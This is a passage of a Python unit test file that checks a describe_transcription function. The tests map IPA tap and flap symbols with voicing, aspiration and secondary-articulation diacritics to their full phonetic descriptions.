expected = "voiceless velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ˤ")
self.assertEqual(actual, expected)
def test_ⱱ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̥ʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʰ")
self.assertEqual(actual, expected)
def test_ⱱ̊ʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ⱱ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ⱱ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ⱱ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ⱱ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ_is_the_representation_of_the_voiced_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ")
self.assertEqual(actual, expected)
# voiced labialized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʷ_is_the_representation_of_the_voiced_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʷ")
self.assertEqual(actual, expected)
# voiced palatalized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʲ_is_the_representation_of_the_voiced_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʲ")
self.assertEqual(actual, expected)
# voiced velarized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱˠ_is_the_representation_of_the_voiced_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱˤ_is_the_representation_of_the_voiced_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱˤ")
self.assertEqual(actual, expected)
# voiced aspirated labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʰ")
self.assertEqual(actual, expected)
def test_ⱱ̬ʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʰʷ")
self.assertEqual(actual, expected)
def test_ⱱ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʰʲ")
self.assertEqual(actual, expected)
def test_ⱱ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʰˠ")
self.assertEqual(actual, expected)
def test_ⱱ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʰˤ")
self.assertEqual(actual, expected)
def test_ⱱ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless alveolar tap or flap pulmonic egressive consonant
def test_ɾ̊_is_the_representation_of_the_voiceless_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊")
self.assertEqual(actual, expected)
def test_ɾ̥_is_the_representation_of_the_voiceless_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʷ")
self.assertEqual(actual, expected)
def test_ɾ̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʲ")
self.assertEqual(actual, expected)
def test_ɾ̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ˠ")
self.assertEqual(actual, expected)
def test_ɾ̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ˤ")
self.assertEqual(actual, expected)
def test_ɾ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar tap or flap pulmonic egressive consonant
def test_ɾ̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʰ")
self.assertEqual(actual, expected)
def test_ɾ̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɾ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɾ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɾ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɾ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar tap or flap pulmonic egressive consonant
def test_ɾ_is_the_representation_of_the_voiced_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ")
self.assertEqual(actual, expected)
# voiced labialized alveolar tap or flap pulmonic egressive consonant
def test_ɾʷ_is_the_representation_of_the_voiced_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar tap or flap pulmonic egressive consonant
def test_ɾʲ_is_the_representation_of_the_voiced_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar tap or flap pulmonic egressive consonant
def test_ɾˠ_is_the_representation_of_the_voiced_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar tap or flap pulmonic egressive consonant
def test_ɾˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolar tap or flap pulmonic egressive consonant
def test_ɾʰ_is_the_representation_of_the_voiced_aspirated_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʰ")
self.assertEqual(actual, expected)
def test_ɾ̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar tap or flap pulmonic egressive consonant
def test_ɾʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʰʷ")
self.assertEqual(actual, expected)
def test_ɾ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar tap or flap pulmonic egressive consonant
def test_ɾʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʰʲ")
self.assertEqual(actual, expected)
def test_ɾ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar tap or flap pulmonic egressive consonant
def test_ɾʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʰˠ")
self.assertEqual(actual, expected)
def test_ɾ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar tap or flap pulmonic egressive consonant
def test_ɾʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʰˤ")
self.assertEqual(actual, expected)
def test_ɾ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless retroflex tap or flap pulmonic egressive consonant
def test_ɽ̊_is_the_representation_of_the_voiceless_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊")
self.assertEqual(actual, expected)
def test_ɽ̥_is_the_representation_of_the_voiceless_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥")
self.assertEqual(actual, expected)
# voiceless labialized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʷ")
self.assertEqual(actual, expected)
def test_ɽ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʲ")
self.assertEqual(actual, expected)
def test_ɽ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ˠ")
self.assertEqual(actual, expected)
def test_ɽ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ˤ")
self.assertEqual(actual, expected)
def test_ɽ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated retroflex tap or flap pulmonic egressive consonant
def test_ɽ̥ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʰ")
self.assertEqual(actual, expected)
def test_ɽ̊ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɽ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɽ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɽ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɽ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced retroflex tap or flap pulmonic egressive consonant
def test_ɽ_is_the_representation_of_the_voiced_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ")
self.assertEqual(actual, expected)
# voiced labialized retroflex tap or flap pulmonic egressive consonant
def test_ɽʷ_is_the_representation_of_the_voiced_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʷ")
self.assertEqual(actual, expected)
# voiced palatalized retroflex tap or flap pulmonic egressive consonant
def test_ɽʲ_is_the_representation_of_the_voiced_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʲ")
self.assertEqual(actual, expected)
# voiced velarized retroflex tap or flap pulmonic egressive consonant
def test_ɽˠ_is_the_representation_of_the_voiced_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized retroflex tap or flap pulmonic egressive consonant
def test_ɽˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽˤ")
self.assertEqual(actual, expected)
# voiced aspirated retroflex tap or flap pulmonic egressive consonant
def test_ɽʰ_is_the_representation_of_the_voiced_aspirated_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʰ")
self.assertEqual(actual, expected)
def test_ɽ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized retroflex tap or flap pulmonic egressive consonant
def test_ɽʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʰʷ")
self.assertEqual(actual, expected)
def test_ɽ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized retroflex tap or flap pulmonic egressive consonant
def test_ɽʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʰʲ")
self.assertEqual(actual, expected)
def test_ɽ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized retroflex tap or flap pulmonic egressive consonant
def test_ɽʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʰˠ")
self.assertEqual(actual, expected)
def test_ɽ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̬ʰˠ")
self.assertEqual(actual, expected)
